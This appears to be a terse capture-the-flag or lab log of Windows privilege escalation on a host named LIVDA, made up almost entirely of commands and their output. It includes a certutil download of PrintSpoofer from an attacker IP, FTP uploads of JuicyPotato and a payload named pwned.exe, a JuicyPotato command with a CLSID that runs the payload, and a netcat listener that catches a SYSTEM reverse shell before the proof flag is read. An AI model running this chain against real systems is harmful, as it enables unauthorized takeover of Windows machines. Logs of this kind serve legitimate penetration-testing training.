Priv Esc

C:\wamp\www>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

C:\ProgramData>certutil.exe -urlcache -f http://192.168.45.239/PrintSpoofer32.exe printspoofer.exe
certutil.exe -urlcache -f http://192.168.45.239/PrintSpoofer32.exe printspoofer.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

ftp> put JuicyPotatox86.exe
local: JuicyPotatox86.exe remote: JuicyPotatox86.exe
229 Entering Extended Passive Mode (|||2053|)
150 File status okay; about to open data connection.
100% |*************************************************|   257 KiB    1.58 MiB/s    00:00 ETA
226 Closing data connection.
263680 bytes sent in 00:00 (1.06 MiB/s)

ftp> put pwned.exe
local: pwned.exe remote: pwned.exe
229 Entering Extended Passive Mode (|||20
150 File status okay; about to open data 
100% |***********************************
226 Closing data connection.
73802 bytes sent in 00:00 (455.07 KiB/s)

JuicyPotatox86.exe -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} -l 1337 -p "C:\wamp\www\pwned.exe"

❯ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.246.46] 49162
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>hostname && whoami.exe && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
hostname && whoami.exe && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
LIVDA
nt authority\system
438e44340d9a8c643fdbc13305432ba9

Windows IP Configuration


Ethernet adapter Local Area Connection 2:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::993b:14ec:27b5:7c4e%12
   IPv4 Address. . . . . . . . . . . : 192.168.246.46
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.246.254

Tunnel adapter Local Area Connection*:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter Local Area Connection* 9:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :